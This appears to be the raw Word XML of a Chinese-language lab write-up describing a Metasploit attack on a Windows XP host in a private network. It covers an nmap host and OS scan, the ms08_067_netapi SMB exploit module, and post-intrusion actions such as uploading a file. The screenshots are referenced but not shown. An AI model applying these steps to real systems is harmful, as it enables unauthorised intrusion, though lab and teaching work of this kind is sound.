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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666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color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. 打開KALI的TERMINAL並查詢本機ip (ifconfig)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="cccccc" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4967288" cy="359537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3595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666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="cccccc" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. 利用nmap掃同網段有哪些ip (nmap -sP [IP])</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="cccccc" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="2844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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666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color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. 查詢10.0.2.4為WINDOWS XP (利用nmap -O [IP])</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="cccccc" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="2273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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666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color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. 打開msfconsole (msfconsole)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="cccccc" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="3200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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666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color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. 尋找可用工具 (search platform: [platform])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="cccccc" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="cccccc" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3343275" cy="1809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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666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color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. 這裡我使用的是exploit/windows/smb//ms08_067_netapi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="cccccc" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="2298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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666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color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. 設置一開始搜到的ip (10.0.2.4) 並確認參數</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="cccccc" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="1714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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666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color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8. 攻擊 (exploit)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="cccccc" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="1104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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666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color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9. 成功入侵，此圖為進入桌面後我所做的操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:ind w:left="566.9291338582675" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="cccccc" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(設置資料夾HAHAHA &gt; upload virus.txt &gt; 截圖)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="cccccc" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="2527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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666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color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10. 成果</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="43053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color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="43053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FKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="666666"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="430530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FKai-SB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jpg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10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